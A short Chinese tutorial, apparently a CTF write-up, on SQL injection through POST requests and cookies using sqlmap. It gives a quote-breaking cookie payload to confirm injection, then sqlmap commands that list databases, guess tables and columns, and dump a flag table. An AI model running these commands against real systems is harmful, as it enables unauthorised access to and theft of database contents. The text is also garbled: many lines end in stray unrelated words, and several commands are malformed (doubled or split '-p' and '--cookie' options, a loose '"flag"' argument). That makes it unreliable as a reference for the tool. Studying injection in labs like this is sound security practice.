目錄
- sqlmap的POST注入
- cookie注入暴數據庫
POST注入
1.驗證存在注入mysql
正常數據包"cookie:user=user"修改"cookie:user=admin"後都會出現flag參數sql
驗證Cookie: user=admin’ and ‘1’=1’報錯,回顯沒有flag,說明這種狀況就存在注入數據庫
2.複製post另存爲1.txt文件cookie
>>這裏是修改cookie後進行注入的,那麼要結合cookie注入來看post注入的原理,其實兩個是要聯合進行注入的,互不影響。post
cookie注入
所謂的POST注入是發送POST請就包進行注入,cookie注入是修改cookie信息進行假裝身份或者說是做爲一個注入點進行滲透spa
1.暴數據庫
>sqlmap -r 1.txt -p --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql --dbsblog
>>能夠看到有四個數據庫string
POST文件1.txt這裏要寫文件位置如:/root/1.txttable
cookie要寫成:--cookie="user=admin"class
--string參數,用來來指定結果爲true時頁面所包含的字符,不包含這個字符的都會被判斷爲false:--string=「flag」表示正確時候回顯flag這個單詞
指定數據庫類型:--dbms=mysql
暴數據庫:--dbs
2.猜表
>sqlmap -r 1.txt -p --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql -D employee --tables
>>猜出employee數據庫下有三個表
對特定的數據庫進行猜表:-D 數據庫名
猜表:--tables
其它的參數不變
3.猜表fllaagg中的列
>sqlmap -r 1.txt -p --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql -D employee -T fllaagg --columns
猜列要指定數據庫、表:-D 數據庫 -T 數據表
猜列:--columns
4.猜表中的字段
>sqlmap -r 1.txt -p - -cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql -D employee -T fllaagg "flag" --dump
>>找到包含flag的字段
猜字段要指定數據庫、表、內容:-D 數據庫 -T 數據表 "內容"
猜字段:--dump
一樣的方法能夠查看其它數據庫、表的內容,注入點方法也是同樣的,這裏注入點爲cookie修改數據後的數據包。若是自己POST數據包存在注入直接使用post注入,能夠不用加cookie注入--cookie「user=admin」相似這樣的參數。